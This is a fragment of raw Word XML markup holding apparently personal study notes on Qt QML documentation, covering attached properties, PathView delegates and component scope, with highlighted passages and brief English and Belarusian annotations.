            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>attached properties</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AD4003">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4003">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>from bindings due to their interaction with the scope object</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="007F5E0C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Conceptually attached properties exist on</w:t>
      </w:r>
      <w:r w:rsidRPr="007F5E0C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007F5E0C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r w:rsidRPr="007F5E0C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007F5E0C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="007F5E0C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>even if they only have an effect on a subset of those</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Consequently unqualified attached property reads will always resolve to an attached property on the scope object, which is not always what the programmer intended.</w:t>
      </w:r>
      <w:r w:rsidR="00AD4003">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AD4003" w:rsidRPr="00AD4003">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Intbu this problem. See example below.</w:t>
      </w:r>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F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidRPr="007F5E0C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId408" w:history="1">
        <w:r w:rsidRPr="00F3106D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>PathView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type attaches interpolated value properties to its delegates depending on their position in the path. As</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId409" w:history="1">
        <w:r w:rsidRPr="00F3106D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>PathView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>only meaningfully attaches these properties to the root object in the delegate, any sub-object that accesses them must explicitly qualify the root object, as shown below.</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PathView</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delegate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Component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Rectangle</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id</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root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Image</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scale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root</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PathView</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scale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lastRenderedPageBreak/>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Fonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F3106D" w:rsidRPr="007F5E0C" w:rsidRDefault="00F3106D" w:rsidP="00F3106D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If the</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId410" w:anchor="image" w:history="1">
        <w:r w:rsidRPr="00F3106D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Image</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object omitted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root</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>prefix, it would inadvertently access the unset</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PathView.scale</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attached property on itself.</w:t>
      </w:r>
      <w:r w:rsidR="00AD4003">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007F5E0C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="007F5E0C" w:rsidRPr="007F5E0C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">гэта таму, што каранёвы аб’ект – гэта </w:t>
      </w:r>
      <w:r w:rsidR="007F5E0C" w:rsidRPr="007F5E0C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PathView?</w:t>
      </w:r>
      <w:r w:rsidR="007F5E0C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F3106D" w:rsidRPr="00F3106D" w:rsidRDefault="00F3106D" w:rsidP="007F5E0C">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="531" w:name="component-scope"/>
      <w:bookmarkStart w:id="532" w:name="_Toc483000644"/>
      <w:bookmarkStart w:id="533" w:name="_Toc483003661"/>
      <w:bookmarkStart w:id="534" w:name="_Toc483603997"/>
      <w:bookmarkStart w:id="535" w:name="_Toc483605217"/>
      <w:bookmarkEnd w:id="531"/>
      <w:r w:rsidRPr="007F5E0C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Component Scope</w:t>
      </w:r>
      <w:bookmarkEnd w:id="532"/>
      <w:bookmarkEnd w:id="533"/>
      <w:bookmarkEnd w:id="534"/>
      <w:bookmarkEnd w:id="535"/>
    </w:p>
    <w:p w:rsidR="00F3106D" w:rsidRPr="00F3106D" w:rsidRDefault="00F3106D" w:rsidP="00F3106D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4003">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Each QML component</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a QML document </w:t>
      </w:r>
      <w:r w:rsidRPr="007F5E0C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">defines a logical </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4003">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>scope</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="007F5E0C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Each document</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> has at least one root component, but </w:t>
      </w:r>
      <w:r w:rsidRPr="007F5E0C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can also have other inline sub-components</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4003">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">component scope is the </w:t>
      </w:r>
      <w:r w:rsidRPr="007F5E0C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>union of the object ids within the component and the component's root object's properties</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007F5E0C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> // </w:t>
      </w:r>
      <w:r w:rsidR="007F5E0C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>very strict and accurate definition</w:t>
      </w:r>
      <w:r w:rsidR="007F5E0C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</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Item</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string</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> title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Text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id</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titletype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text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"&lt;b&gt;"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title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"&lt;/b&gt;"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font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pixelSize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22</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anchors</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top</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parent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top</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Text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text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titletype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text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font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pixelSize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18</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anchors</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bottom</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parent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bottom</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Fonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The example above shows a simple QML component that displays a rich text title string at the top, and a smaller copy of the same text at the bottom. The first</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Text</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type directly accesses the component's</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w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property when forming the text to display. That the root type's properties are directly accessible makes it trivial to distribute data throughout the component.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F3106D" w:rsidRPr="00207D80" w:rsidRDefault="00F3106D" w:rsidP="00F3106D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The second</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Text</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">type uses an id to access the first's text directly. </w:t>
      </w:r>
      <w:r w:rsidRPr="00207D80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IDs are specified explicitly by the QML programmer</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> so they </w:t>
      </w:r>
      <w:r w:rsidRPr="00207D80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">always take </w:t>
      </w:r>
      <w:r w:rsidRPr="007F5E0C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>precedence over other property names</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00207D80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>except</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for those in the</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId411" w:anchor="javascript-scope" w:history="1">
        <w:r w:rsidRPr="00207D80">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>JavaScript Scope</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>). For example, in the unlikely event that the binding's</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId412" w:anchor="binding-scope-object" w:history="1">
        <w:r w:rsidRPr="00F3106D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>scope object</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
